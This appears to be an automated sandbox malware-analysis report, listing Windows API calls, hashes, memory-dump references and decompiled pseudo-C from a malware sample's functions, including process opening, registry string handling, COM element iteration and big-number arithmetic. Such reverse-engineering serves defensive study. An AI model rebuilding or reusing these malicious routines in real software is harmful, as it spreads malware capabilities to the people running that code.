                                                                                                                                                                                                                                    0x02f98f5b
                                                                                                                                                                                                                                    0x02f98f63
                                                                                                                                                                                                                                    0x02f98f68
                                                                                                                                                                                                                                    0x02f98f6a
                                                                                                                                                                                                                                    0x02f98f6a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98f71
                                                                                                                                                                                                                                    0x02f98f33
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f98f35
                                                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,02F96A90,?,?,00000001,?,?,?,02F9807D,?), ref: 02F98F18
                                                                                                                                                                                                                                    • GetVersion.KERNEL32(?,00000001,?,?,?,02F9807D,?), ref: 02F98F27
                                                                                                                                                                                                                                    • GetCurrentProcessId.KERNEL32(?,00000001,?,?,?,02F9807D,?), ref: 02F98F3E
                                                                                                                                                                                                                                    • OpenProcess.KERNEL32(0010047A,00000000,00000000,?,00000001,?,?,?,02F9807D,?), ref: 02F98F5B
                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000001,?,?,?,02F9807D,?), ref: 02F98F7A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2270775618-0
                                                                                                                                                                                                                                    • Opcode ID: ca08e3f66b68c5d26cb4a2c82770c9dab9c6f1a7c41f36578465e7a5de28a348
                                                                                                                                                                                                                                    • Instruction ID: eba0f1e98b352fcb5a1206e710c1b0283b5b738fda9ee04df91229699e35ef03
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ca08e3f66b68c5d26cb4a2c82770c9dab9c6f1a7c41f36578465e7a5de28a348
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ADF06271EC43099BFB209F24AD09B14BB62A74ABC4F505D1BE342C61D0D7718061CF24
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F917D5, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 172stringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                                                                                                                    			E02F917D5(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				char _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t97;
				void* _t98;
				char _t104;
				signed int* _t106;
				intOrPtr* _t107;
				void* _t108;

				_t98 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t104 = _a16;
				if(_t104 == 0) {
					__imp__( &_v284,  *0x2f9d33c);
					_t97 = 0x80000002;
					L6:
					_t60 = E02F9809F(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t107 = _a24;
					if(E02F988B7(_t98, _t103, _t107, _t97, _t60) != 0) {
						L27:
						E02F99039(_a8);
						goto L29;
					}
					_t65 =  *0x2f9d27c; // 0x44a5a8
					_t16 = _t65 + 0x2f9e8fe; // 0x65696c43
					_t68 = E02F9809F(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t107 + 0x14; // 0x102
						_t33 = _t107 + 0x10; // 0x3d02f9c0
						if(E02F9A635(_t103,  *_t33, _t97, _a8,  *0x2f9d334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x2f9d27c; // 0x44a5a8
							if(_t104 == 0) {
								_t35 = _t72 + 0x2f9ea5f; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x2f9e89f; // 0x55434b48
								_t73 = _t34;
							}
							if(E02F9816C(_t73,  *0x2f9d334,  *0x2f9d338,  &_a24,  &_a16) == 0) {
								if(_t104 == 0) {
									_t75 =  *0x2f9d27c; // 0x44a5a8
									_t44 = _t75 + 0x2f9e871; // 0x74666f53
									_t78 = E02F9809F(0, _t44);
									_t105 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t107 + 0x10; // 0x3d02f9c0
										E02F92659( *_t47, _t97, _a8,  *0x2f9d338, _a24);
										_t49 = _t107 + 0x10; // 0x3d02f9c0
										E02F92659( *_t49, _t97, _t105,  *0x2f9d330, _a16);
										E02F99039(_t105);
									}
								} else {
									_t40 = _t107 + 0x10; // 0x3d02f9c0
									E02F92659( *_t40, _t97, _a8,  *0x2f9d338, _a24);
									_t43 = _t107 + 0x10; // 0x3d02f9c0
									E02F92659( *_t43, _t97, _a8,  *0x2f9d330, _a16);
								}
								if( *_t107 != 0) {
									E02F99039(_a24);
								} else {
									 *_t107 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t107 + 0x10; // 0x3d02f9c0
					if(E02F96BFA( *_t21, _t97, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t106 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t106 =  *_t106 & 0x00000000;
							_t26 = _t107 + 0x10; // 0x3d02f9c0
							E02F9A635(_t103,  *_t26, _t97, _a8, _a24, _t106);
						}
						E02F99039(_t106);
						_t104 = _a16;
					}
					E02F99039(_a24);
					goto L14;
				}
				if(_t104 <= 8 || _t104 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					_t103 = _a8;
					E02F9A8D8(_t104, _a8,  &_v284);
					__imp__(_t108 + _t104 - 0x117,  *0x2f9d33c);
					 *((char*)(_t108 + _t104 - 0x118)) = 0x5c;
					_t97 = 0x80000003;
					goto L6;
				}
			}























                                                                                                                                                                                                                                    0x02f917d5
                                                                                                                                                                                                                                    0x02f917de
                                                                                                                                                                                                                                    0x02f917e5
                                                                                                                                                                                                                                    0x02f917ea
                                                                                                                                                                                                                                    0x02f91857
                                                                                                                                                                                                                                    0x02f9185d
                                                                                                                                                                                                                                    0x02f91862
                                                                                                                                                                                                                                    0x02f9186b
                                                                                                                                                                                                                                    0x02f91872
                                                                                                                                                                                                                                    0x02f91875
                                                                                                                                                                                                                                    0x02f919e9
                                                                                                                                                                                                                                    0x02f919f0
                                                                                                                                                                                                                                    0x02f919f0
                                                                                                                                                                                                                                    0x02f919f5
                                                                                                                                                                                                                                    0x02f919f7
                                                                                                                                                                                                                                    0x02f919f7
                                                                                                                                                                                                                                    0x02f91a00
                                                                                                                                                                                                                                    0x02f91a00
                                                                                                                                                                                                                                    0x02f9187b
                                                                                                                                                                                                                                    0x02f91887
                                                                                                                                                                                                                                    0x02f919df
                                                                                                                                                                                                                                    0x02f919e2
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f919e2
                                                                                                                                                                                                                                    0x02f9188d
                                                                                                                                                                                                                                    0x02f91892
                                                                                                                                                                                                                                    0x02f9189b
                                                                                                                                                                                                                                    0x02f918a2
                                                                                                                                                                                                                                    0x02f918a5
                                                                                                                                                                                                                                    0x02f918ef
                                                                                                                                                                                                                                    0x02f918ef
                                                                                                                                                                                                                                    0x02f91902
                                                                                                                                                                                                                                    0x02f9190c
                                                                                                                                                                                                                                    0x02f91914
                                                                                                                                                                                                                                    0x02f91919
                                                                                                                                                                                                                                    0x02f91923
                                                                                                                                                                                                                                    0x02f91923
                                                                                                                                                                                                                                    0x02f9191b
                                                                                                                                                                                                                                    0x02f9191b
                                                                                                                                                                                                                                    0x02f9191b
                                                                                                                                                                                                                                    0x02f9191b
                                                                                                                                                                                                                                    0x02f91945
                                                                                                                                                                                                                                    0x02f9194d
                                                                                                                                                                                                                                    0x02f9197b
                                                                                                                                                                                                                                    0x02f91980
                                                                                                                                                                                                                                    0x02f91989
                                                                                                                                                                                                                                    0x02f9198e
                                                                                                                                                                                                                                    0x02f91992
                                                                                                                                                                                                                                    0x02f919c4
                                                                                                                                                                                                                                    0x02f91994
                                                                                                                                                                                                                                    0x02f919a1
                                                                                                                                                                                                                                    0x02f919a4
                                                                                                                                                                                                                                    0x02f919b4
                                                                                                                                                                                                                                    0x02f919b7
                                                                                                                                                                                                                                    0x02f919bd
                                                                                                                                                                                                                                    0x02f919bd
                                                                                                                                                                                                                                    0x02f9194f
                                                                                                                                                                                                                                    0x02f9195c
                                                                                                                                                                                                                                    0x02f9195f
                                                                                                                                                                                                                                    0x02f91971
                                                                                                                                                                                                                                    0x02f91974
                                                                                                                                                                                                                                    0x02f91974
                                                                                                                                                                                                                                    0x02f919ce
                                                                                                                                                                                                                                    0x02f919da
                                                                                                                                                                                                                                    0x02f919d0
                                                                                                                                                                                                                                    0x02f919d3
                                                                                                                                                                                                                                    0x02f919d3
                                                                                                                                                                                                                                    0x02f919ce
                                                                                                                                                                                                                                    0x02f91945
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9190c
                                                                                                                                                                                                                                    0x02f918b4
                                                                                                                                                                                                                                    0x02f918be
                                                                                                                                                                                                                                    0x02f918c0
                                                                                                                                                                                                                                    0x02f918c5
                                                                                                                                                                                                                                    0x02f918c9
                                                                                                                                                                                                                                    0x02f918cb
                                                                                                                                                                                                                                    0x02f918d6
                                                                                                                                                                                                                                    0x02f918d9
                                                                                                                                                                                                                                    0x02f918d9
                                                                                                                                                                                                                                    0x02f918df
                                                                                                                                                                                                                                    0x02f918e4
                                                                                                                                                                                                                                    0x02f918e4
                                                                                                                                                                                                                                    0x02f918ea
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f918ea
                                                                                                                                                                                                                                    0x02f917ef
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f91816
                                                                                                                                                                                                                                    0x02f91816
                                                                                                                                                                                                                                    0x02f91822
                                                                                                                                                                                                                                    0x02f91835
                                                                                                                                                                                                                                    0x02f9183b
                                                                                                                                                                                                                                    0x02f91843
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f91843

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • StrChrA.SHLWAPI(02F93C81,0000005F,00000000,00000000,00000104), ref: 02F91808
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,?), ref: 02F91835
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: lstrlen.KERNEL32(?,00000000,02F9D330,00000001,02F92200,02F9D00C,02F9D00C,00000000,00000005,00000000,00000000,?,?,?,02F996C1,02F923E9), ref: 02F980A8
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: mbstowcs.NTDLL ref: 02F980CF
                                                                                                                                                                                                                                      • Part of subcall function 02F9809F: memset.NTDLL ref: 02F980E1
                                                                                                                                                                                                                                      • Part of subcall function 02F92659: lstrlenW.KERNEL32(02F93C81,?,?,02F919A9,3D02F9C0,80000002,02F93C81,02F98B1E,74666F53,4D4C4B48,02F98B1E,?,3D02F9C0,80000002,02F93C81,?), ref: 02F92679
                                                                                                                                                                                                                                      • Part of subcall function 02F99039: HeapFree.KERNEL32(00000000,00000000,02F97F18,00000000,?,?,00000000), ref: 02F99045
                                                                                                                                                                                                                                    • lstrcpy.KERNEL32(?,00000000), ref: 02F91857
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                                                                                                                                                                                                    • String ID: \
                                                                                                                                                                                                                                    • API String ID: 3924217599-2967466578
                                                                                                                                                                                                                                    • Opcode ID: a85e78ea9e6c26caaa0059fc587fc06856440d15fe0fc73f8b094b1254ce014b
                                                                                                                                                                                                                                    • Instruction ID: c983555429491e74885d5f20cb5738a8b1481a1d7381c510682e1bec6699ba79
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: a85e78ea9e6c26caaa0059fc587fc06856440d15fe0fc73f8b094b1254ce014b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1151297690020EBFEF11AFA1DD44EAB77BAAB093C4F108929FB1992160D731D925DF50
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F952F9, Relevance: 6.2, APIs: 4, Instructions: 152memorystringCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 46%
                                                                                                                                                                                                                                    			E02F952F9(intOrPtr* __eax) {
				void* _v8;
				WCHAR* _v12;
				void* _v16;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				void* _v32;
				intOrPtr _v40;
				short _v48;
				intOrPtr _v56;
				short _v64;
				intOrPtr* _t54;
				intOrPtr* _t56;
				intOrPtr _t57;
				intOrPtr* _t58;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr _t78;
				intOrPtr* _t82;
				intOrPtr* _t86;
				intOrPtr _t102;
				intOrPtr _t108;
				void* _t117;
				void* _t121;
				void* _t122;
				intOrPtr _t129;

				_t122 = _t121 - 0x3c;
				_push( &_v8);
				_push(__eax);
				_t117 =  *((intOrPtr*)( *__eax + 0x48))();
				if(_t117 >= 0) {
					_t54 = _v8;
					_t102 =  *0x2f9d27c; // 0x44a5a8
					_t5 = _t102 + 0x2f9e038; // 0x3050f485
					_t117 =  *((intOrPtr*)( *_t54))(_t54, _t5,  &_v32);
					_t56 = _v8;
					_t57 =  *((intOrPtr*)( *_t56 + 8))(_t56);
					if(_t117 >= 0) {
						__imp__#2(0x2f9c2b0);
						_v28 = _t57;
						if(_t57 == 0) {
							_t117 = 0x8007000e;
						} else {
							_t60 = _v32;
							_t61 =  *((intOrPtr*)( *_t60 + 0xbc))(_t60, _v28,  &_v24);
							_t86 = __imp__#6;
							_t117 = _t61;
							if(_t117 >= 0) {
								_t63 = _v24;
								_t117 =  *((intOrPtr*)( *_t63 + 0x24))(_t63,  &_v20);
								if(_t117 >= 0) {
									_t129 = _v20;
									if(_t129 != 0) {
										_v64 = 3;
										_v48 = 3;
										_v56 = 0;
										_v40 = 0;
										if(_t129 > 0) {
											while(1) {
												_t67 = _v24;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t122 = _t122;
												asm("movsd");
												asm("movsd");
												asm("movsd");
												asm("movsd");
												_t117 =  *((intOrPtr*)( *_t67 + 0x2c))(_t67,  &_v8);
												if(_t117 < 0) {
													goto L16;
												}
												_t69 = _v8;
												_t108 =  *0x2f9d27c; // 0x44a5a8
												_t28 = _t108 + 0x2f9e0bc; // 0x3050f1ff
												_t117 =  *((intOrPtr*)( *_t69))(_t69, _t28,  &_v16);
												if(_t117 >= 0) {
													_t74 = _v16;
													_t117 =  *((intOrPtr*)( *_t74 + 0x34))(_t74,  &_v12);
													if(_t117 >= 0 && _v12 != 0) {
														_t78 =  *0x2f9d27c; // 0x44a5a8
														_t33 = _t78 + 0x2f9e078; // 0x76006f
														if(lstrcmpW(_v12, _t33) == 0) {
															_t82 = _v16;
															 *((intOrPtr*)( *_t82 + 0x114))(_t82);
														}
														 *_t86(_v12);
													}
													_t76 = _v16;
													 *((intOrPtr*)( *_t76 + 8))(_t76);
												}
												_t71 = _v8;
												 *((intOrPtr*)( *_t71 + 8))(_t71);
												_v40 = _v40 + 1;
												if(_v40 < _v20) {
													continue;
												}
												goto L16;
											}
										}
									}
								}
								L16:
								_t65 = _v24;
								 *((intOrPtr*)( *_t65 + 8))(_t65);
							}
							 *_t86(_v28);
						}
						_t58 = _v32;
						 *((intOrPtr*)( *_t58 + 8))(_t58);
					}
				}
				return _t117;
			}




































                                                                                                                                                                                                                                    0x02f952fe
                                                                                                                                                                                                                                    0x02f95307
                                                                                                                                                                                                                                    0x02f95308
                                                                                                                                                                                                                                    0x02f9530c
                                                                                                                                                                                                                                    0x02f95312
                                                                                                                                                                                                                                    0x02f95318
                                                                                                                                                                                                                                    0x02f95321
                                                                                                                                                                                                                                    0x02f95327
                                                                                                                                                                                                                                    0x02f95331
                                                                                                                                                                                                                                    0x02f95333
                                                                                                                                                                                                                                    0x02f95339
                                                                                                                                                                                                                                    0x02f9533e
                                                                                                                                                                                                                                    0x02f95349
                                                                                                                                                                                                                                    0x02f95351
                                                                                                                                                                                                                                    0x02f95354
                                                                                                                                                                                                                                    0x02f95477
                                                                                                                                                                                                                                    0x02f9535a
                                                                                                                                                                                                                                    0x02f9535a
                                                                                                                                                                                                                                    0x02f95367
                                                                                                                                                                                                                                    0x02f9536d
                                                                                                                                                                                                                                    0x02f95373
                                                                                                                                                                                                                                    0x02f95377
                                                                                                                                                                                                                                    0x02f9537d
                                                                                                                                                                                                                                    0x02f9538a
                                                                                                                                                                                                                                    0x02f9538e
                                                                                                                                                                                                                                    0x02f95394
                                                                                                                                                                                                                                    0x02f95397
                                                                                                                                                                                                                                    0x02f9539d
                                                                                                                                                                                                                                    0x02f953a3
                                                                                                                                                                                                                                    0x02f953a9
                                                                                                                                                                                                                                    0x02f953ac
                                                                                                                                                                                                                                    0x02f953af
                                                                                                                                                                                                                                    0x02f953b5
                                                                                                                                                                                                                                    0x02f953be
                                                                                                                                                                                                                                    0x02f953c4
                                                                                                                                                                                                                                    0x02f953c5
                                                                                                                                                                                                                                    0x02f953c8
                                                                                                                                                                                                                                    0x02f953c9
                                                                                                                                                                                                                                    0x02f953ca
                                                                                                                                                                                                                                    0x02f953d2
                                                                                                                                                                                                                                    0x02f953d3
                                                                                                                                                                                                                                    0x02f953d4
                                                                                                                                                                                                                                    0x02f953d6
                                                                                                                                                                                                                                    0x02f953da
                                                                                                                                                                                                                                    0x02f953de
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f953e4
                                                                                                                                                                                                                                    0x02f953ed
                                                                                                                                                                                                                                    0x02f953f3
                                                                                                                                                                                                                                    0x02f953fd
                                                                                                                                                                                                                                    0x02f95401
                                                                                                                                                                                                                                    0x02f95403
                                                                                                                                                                                                                                    0x02f95410
                                                                                                                                                                                                                                    0x02f95414
                                                                                                                                                                                                                                    0x02f9541c
                                                                                                                                                                                                                                    0x02f95421
                                                                                                                                                                                                                                    0x02f95433
                                                                                                                                                                                                                                    0x02f95435
                                                                                                                                                                                                                                    0x02f9543b
                                                                                                                                                                                                                                    0x02f9543b
                                                                                                                                                                                                                                    0x02f95444
                                                                                                                                                                                                                                    0x02f95444
                                                                                                                                                                                                                                    0x02f95446
                                                                                                                                                                                                                                    0x02f9544c
                                                                                                                                                                                                                                    0x02f9544c
                                                                                                                                                                                                                                    0x02f9544f
                                                                                                                                                                                                                                    0x02f95455
                                                                                                                                                                                                                                    0x02f95458
                                                                                                                                                                                                                                    0x02f95461
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f95461
                                                                                                                                                                                                                                    0x02f953b5
                                                                                                                                                                                                                                    0x02f953af
                                                                                                                                                                                                                                    0x02f95397
                                                                                                                                                                                                                                    0x02f95467
                                                                                                                                                                                                                                    0x02f95467
                                                                                                                                                                                                                                    0x02f9546d
                                                                                                                                                                                                                                    0x02f9546d
                                                                                                                                                                                                                                    0x02f95473
                                                                                                                                                                                                                                    0x02f95473
                                                                                                                                                                                                                                    0x02f9547c
                                                                                                                                                                                                                                    0x02f95482
                                                                                                                                                                                                                                    0x02f95482
                                                                                                                                                                                                                                    0x02f9533e
                                                                                                                                                                                                                                    0x02f9548b

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(02F9C2B0), ref: 02F95349
                                                                                                                                                                                                                                    • lstrcmpW.KERNEL32(00000000,0076006F), ref: 02F9542B
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 02F95444
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 02F95473
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.523875245.0000000002F91000.00000020.00020000.sdmp, Offset: 02F90000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.523858661.0000000002F90000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524004271.0000000002F9C000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524048885.0000000002F9D000.00000004.00020000.sdmp Download File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.524106649.0000000002F9F000.00000002.00020000.sdmp Download File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_2f90000_loaddll32.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$Free$Alloclstrcmp
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 1885612795-0
                                                                                                                                                                                                                                    • Opcode ID: 6374adf3727b278898519961533998bf3df4de351637a567f5e4d549a13bde7e
                                                                                                                                                                                                                                    • Instruction ID: 1e6ca85e1d1fdcea9f6060435e997f476a42e3dfb8a2002d47fde27a6271fcaa
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6374adf3727b278898519961533998bf3df4de351637a567f5e4d549a13bde7e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE517E71D00109EFDF01DFA8C9889AEF7BAEF89745B144584EA05EB210D731AD01CFA0
                                                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                                                    Function 02F91017, Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    C-Code - Quality: 85%
                                                                                                                                                                                                                                    			E02F91017(signed int __eax, void* __eflags, intOrPtr _a4, signed int _a8, signed int _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				void _v92;
				void _v236;
				void* _t55;
				unsigned int _t56;
				signed int _t66;
				signed int _t74;
				void* _t76;
				signed int _t79;
				void* _t81;
				void* _t92;
				void* _t96;
				signed int* _t99;
				signed int _t101;
				signed int _t103;
				void* _t107;

				_t92 = _a12;
				_t101 = __eax;
				_t55 = E02F9A7AA(_a16, _t92);
				_t79 = _t55;
				if(_t79 == 0) {
					L18:
					return _t55;
				}
				_t56 =  *(_t92 + _t79 * 4 - 4);
				_t81 = 0;
				_t96 = 0x20;
				if(_t56 == 0) {
					L4:
					_t97 = _t96 - _t81;
					_v12 = _t96 - _t81;
					E02F9968F(_t79,  &_v236);
					 *((intOrPtr*)(_t107 + _t101 * 4 - 0xe8)) = E02F98967(_t101,  &_v236, _a8, _t96 - _t81);
					E02F98967(_t79,  &_v92, _a12, _t97);
					_v8 =  *((intOrPtr*)(_t107 + _t79 * 4 - 0x5c));
					_t66 = E02F9968F(_t101, 0x2f9d1b0);
					_t103 = _t101 - _t79;
					_a8 = _t103;
					if(_t103 < 0) {
						L17:
						E02F9968F(_a16, _a4);
						E02F91D6C(_t79,  &_v236, _a4, _t97);
						memset( &_v236, 0, 0x8c);
						_t55 = memset( &_v92, 0, 0x44);
						goto L18;
					}
					_t99 = _t107 + (_t103 + _t79) * 4 - 0xe8;
					do {
						if(_v8 != 0xffffffff) {
							_push(1);
							_push(0);
							_push(0);
							_push( *_t99);
							L02F9B0C8();
							_t74 = _t66 +  *(_t99 - 4);
							asm("adc edx, esi");
							_push(0);
							_push(_v8 + 1);
							_push(_t92);
							_push(_t74);
							L02F9B0C2();
							if(_t92 > 0 || _t74 > 0xffffffff) {
								_t74 = _t74 | 0xffffffff;
								_v16 = _v16 & 0x00000000;
							}
						} else {
							_t74 =  *_t99;
						}
						_t106 = _t107 + _a8 * 4 - 0xe8;
						_a12 = _t74;
						_t76 = E02F91FB1(_t79,  &_v92, _t92, _t107 + _a8 * 4 - 0xe8, _t107 + _a8 * 4 - 0xe8, _t74);
						while(1) {
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							L13:
							_t92 =  &_v92;
							if(E02F98B62(_t79, _t92, _t106) < 0) {
								break;
							}
							L14:
							_a12 = _a12 + 1;
							_t76 = E02F99100(_t79,  &_v92, _t106, _t106);
							 *_t99 =  *_t99 - _t76;
							if( *_t99 != 0) {
								goto L14;
							}
							goto L13;
						}
						_a8 = _a8 - 1;
						_t66 = _a12;
						_t99 = _t99 - 4;
						 *(0x2f9d1b0 + _a8 * 4) = _t66;
					} while (_a8 >= 0);
					_t97 = _v12;
					goto L17;
				}
				while(_t81 < _t96) {
					_t81 = _t81 + 1;
					_t56 = _t56 >> 1;
					if(_t56 != 0) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}





















                                                                                                                                                                                                                                    0x02f9101a
                                                                                                                                                                                                                                    0x02f91026
                                                                                                                                                                                                                                    0x02f9102c
                                                                                                                                                                                                                                    0x02f91031
                                                                                                                                                                                                                                    0x02f91035
                                                                                                                                                                                                                                    0x02f91192
                                                                                                                                                                                                                                    0x02f91196
                                                                                                                                                                                                                                    0x02f91196
                                                                                                                                                                                                                                    0x02f9103b
                                                                                                                                                                                                                                    0x02f9103f
                                                                                                                                                                                                                                    0x02f91045
                                                                                                                                                                                                                                    0x02f91046
                                                                                                                                                                                                                                    0x02f91051
                                                                                                                                                                                                                                    0x02f91057
                                                                                                                                                                                                                                    0x02f9105c
                                                                                                                                                                                                                                    0x02f9105f
                                                                                                                                                                                                                                    0x02f91079
                                                                                                                                                                                                                                    0x02f91085
                                                                                                                                                                                                                                    0x02f9108e
                                                                                                                                                                                                                                    0x02f91098
                                                                                                                                                                                                                                    0x02f9109d
                                                                                                                                                                                                                                    0x02f9109f
                                                                                                                                                                                                                                    0x02f910a2
                                                                                                                                                                                                                                    0x02f91150
                                                                                                                                                                                                                                    0x02f91156
                                                                                                                                                                                                                                    0x02f91167
                                                                                                                                                                                                                                    0x02f9117a
                                                                                                                                                                                                                                    0x02f9118a
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f9118f
                                                                                                                                                                                                                                    0x02f910ab
                                                                                                                                                                                                                                    0x02f910b2
                                                                                                                                                                                                                                    0x02f910b6
                                                                                                                                                                                                                                    0x02f910bc
                                                                                                                                                                                                                                    0x02f910be
                                                                                                                                                                                                                                    0x02f910c0
                                                                                                                                                                                                                                    0x02f910c2
                                                                                                                                                                                                                                    0x02f910c4
                                                                                                                                                                                                                                    0x02f910ce
                                                                                                                                                                                                                                    0x02f910d3
                                                                                                                                                                                                                                    0x02f910d5
                                                                                                                                                                                                                                    0x02f910d7
                                                                                                                                                                                                                                    0x02f910d8
                                                                                                                                                                                                                                    0x02f910d9
                                                                                                                                                                                                                                    0x02f910da
                                                                                                                                                                                                                                    0x02f910e1
                                                                                                                                                                                                                                    0x02f910e8
                                                                                                                                                                                                                                    0x02f910eb
                                                                                                                                                                                                                                    0x02f910eb
                                                                                                                                                                                                                                    0x02f910b8
                                                                                                                                                                                                                                    0x02f910b8
                                                                                                                                                                                                                                    0x02f910b8
                                                                                                                                                                                                                                    0x02f910f3
                                                                                                                                                                                                                                    0x02f910fb
                                                                                                                                                                                                                                    0x02f91104
                                                                                                                                                                                                                                    0x02f91109
                                                                                                                                                                                                                                    0x02f91109
                                                                                                                                                                                                                                    0x02f9110e
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                                                    0x02f91110
                                                                                                                                                                                                                                    0x02f91113
                                                                                                                                                                                                                                    0x02f9111d
